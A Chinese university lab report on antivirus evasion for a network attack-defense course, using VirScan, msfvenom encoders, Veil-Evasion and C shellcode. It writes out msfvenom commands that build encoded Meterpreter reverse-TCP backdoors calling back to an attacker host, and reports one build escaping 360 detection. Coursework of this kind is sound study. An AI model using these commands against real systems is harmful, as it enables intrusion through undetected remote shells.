• 20155235 《网络攻防》 实验三 免杀原理与实践 实验报告


    20155235 《网络攻防》 实验三 免杀原理与实践 实验报告

    实验目的

    通过本部分内容的学习,认识到杀软局限性,提高在工作生活中对于恶意软件防范能力。

    实验内容

    (1)用VirScan来检测后门

    (2)Msfvenom使用编码器

    (3)Veil-Evasion

    (4)C语言调用Shellcode

    实验一 用VirScan来检测后门

    按理说检查的应该是实验二生成的后门,但是,我用VirScan检验后门时,出现了一个让我意想不到的情况

    让我十分的震惊了

    任务二 Msfvenom使用编码器

    重复编码,输入
    msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b ‘x00’ LHOST=[本机IP] LPORT=5235 -f exe > 5235Backdoor.exe
    结果一样,内心崩溃。

    任务三 Veil-Evasion

    安装Veil-Evasion
    因为我的虚拟机不能直接通过 sudo apt-get install 安装,所以我参考了一下周泽堃同学第三次实验博客中关于Veil-Evasion的安装方法,然而,也失败了,最后经过了一番波折,我最终选择,拷贝了其他同学下好的Veil-Evasion。
    使用Veil-Evasion
    输入 veil ,用 use evasion list payloads ,进入到payloads模板界面,经过一番操作后,成功生成

    任务四 C语言调用Shellcode

    输入msfvenom -p windows/meterpreter/reverse_tcp LHOST=[kali IP] LPORT=5235 -f c 生成C语言代码,C语言代码就不贴了
    回连监听

    用 VirScan检测,结果为

    经过5次重复编译后,用VirScan检测结果为

    后记

    实验成功真是可喜可贺,比较开心的是最后shellcode生成的C语言代码,无论是编译1次还是编译5次,奇虎360都没有检测出来,这让我无比的开心。但是我博客交的有些晚了,对不起老师!

  • 相关阅读:
    编程语言的精髓
    进销存-库存表-算法
    JAVA 将JSON数组转化成JAVA数组
    使input文本框不可编辑的3种方法
    如何让一个DIV固定在另一个DIV的底部
    错误笔记既 onclick()事件写方法传jstl表达式作为变量
    错误笔记
    SQL查询语句左连接
    查已有表的建表语句
    使用(文件上传域)MultipartFile接受文件时的判空方式
  • 原文地址:https://www.cnblogs.com/WYjingheng/p/8799620.html
Copyright © 2020-2023  润新知